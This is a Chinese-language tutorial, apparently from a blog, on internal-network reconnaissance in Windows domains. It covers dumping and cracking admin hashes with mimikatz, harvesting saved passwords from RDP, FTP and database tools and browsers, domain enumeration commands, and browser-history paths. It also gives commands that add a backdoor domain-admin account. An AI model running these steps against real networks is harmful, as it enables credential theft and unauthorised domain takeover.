内网渗透之信息收集

信息获取总是第一步执行的操作,利用管理员的疏忽或者内网机器的弱口令来发现更多的信息。

① 可以使用工具pwdump、mimikatz来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。

② 查看远程桌面的连接信息,一般通过远程桌面经常连接的机器会在该程序打开时候的下拉菜单中保存,如果管理员选择的是记住密码的话,那么就轻松跳转其他机器。

③ 假如存在数据库管理工具,ftp管理工具等,如Navicat,SecureCRT,flashfxp等,查看是否是保存的密码,尝试登陆。

④ 各款浏览器的保存登陆密码,作为自己的密码表,在进行内网其他机器的登陆时尝试。

⑤ 有无VPN连接信息。

 

1、获取当前组的计算机名

一般remark有Dc可能是域控

net view

内网渗透之信息收集_第1张图片

 

2、查看所有域

net view /domain

内网渗透之信息收集_第2张图片

 

3、从计算机名获取IP地址

ping -n 1 计算机名 -4

内网渗透之信息收集_第3张图片

也可以用脚本批量获取IP

@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)
)
)

执行命令时候会发送到域控查询,如果渗透的机器不是域用户权限,则会报错

The request will be processed at a domain controller for domain

System error 1326 has occurred.

Logon failure: unknown user name or bad password.

 

4、查看域中的用户名

net user /domain 域控下执行

内网渗透之信息收集_第4张图片

 

5、查看域中用户的详细信息

net user Administrator /domain

内网渗透之信息收集_第5张图片

 

6、查询域组名称

net group /domain

内网渗透之信息收集_第6张图片

 

7、查询域管理员

net group "Domain Admins" /domain

内网渗透之信息收集_第7张图片

 

8、添加域管理员账号

添加普通域用户

net user lemon iam@L3m0n /add /domain

将普通域用户提升为域管理员

net group "Domain Admins" lemon /add /domain

 

9、查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域

net config Workstation

内网渗透之信息收集_第8张图片

 

10、查看域控制器

多域控制器的时候,而且只能用在域控制器上

net group "Domain controllers"

 

11、查询所有计算机名称

net group "Domain Computers" /domain 

 

12、net命令

>1、映射磁盘到本地

net use z: \\dc01\sysvol

>2、查看共享

net view \\192.168.0.1

>3、开启一个共享名为app$,在d:\config

>net share app$=d:\config 

 

13、跟踪路由

tracert 8.8.8.8

 

14、查看域时间及域服务器的名字

net time /domain

 

15、查询域控

net group “Domain Controllers” /domain

内网渗透之信息收集_第9张图片

 

16、获取域控IP

dsquery server

内网渗透之信息收集_第10张图片

 

17、查看安装的软件版本

powershell命令

Get-WmiObject -class Win32_Product |Select-Object -Property name,version

内网渗透之信息收集_第11张图片

 

18、查看在线用户

query user / qwinsta

内网渗透之信息收集_第12张图片

 

19、查看计算机配置信息

systeminfo

内网渗透之信息收集_第13张图片

 

20、查看补丁安装情况

wmic qfe

 

21、查询杀毒软件安装情况

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

内网渗透之信息收集_第14张图片

 

22、获得Windows系统的远程桌面连接历史记录

https://github.com/3gstudent/List-RDP-Connections-History

用powershell运行脚本

根据远程桌面连接历史记录,就能定位出关键的服务器

内网渗透之信息收集_第15张图片

内网渗透之信息收集_第16张图片

 

Chrome 历史浏览文件

Chrome 历史浏览文件保存在History文件中,该文件在各大操作系统位置大致如下(参考这里):

Linux

/ home /  / .config / google-chrome / Default / History

Mac

/ Users /  / Library / Application Support / Google / Chrome / Default / History

Windows XP

C:\ Documents and Settings \  \ Local Settings \ Application Data \ Google \ Chrome \ User Data \ Default \ History

Windows Vista 以及之后的版本

C:\ Users\  \ AppData \ Local \ Google \ Chrome \ User Data \ Default \ History

 

Firefox 历史浏览文件

Firefox 历史浏览文件保存在places.sqlite文件中,该文件在各大操作系统位置大致如下(参考这里):

Linux

/ home / /.mozilla / firefox / <配置文件文件夹> / places.sqlite

Mac

/ Users / / Application Support / Firefox / Profiles / <配置文件文件夹> / places.sqlite

/ Users / / Library / Mozilla / Firefox / Profiles / <配置文件文件夹> / places.sqlite

Windows XP、2000

C:\ Documents and Settings \  \ Application Data \ Mozilla \ Firefox \ Profiles \ <配置文件文件夹> \places.sqlite

Windows Vista 及更高的版本

C:\ Users \  \ AppData \ Roaming \ Mozilla \ Firefox \ Profiles \ <配置文件文件夹> \ places.sqlite

你可能感兴趣的:(内网渗透)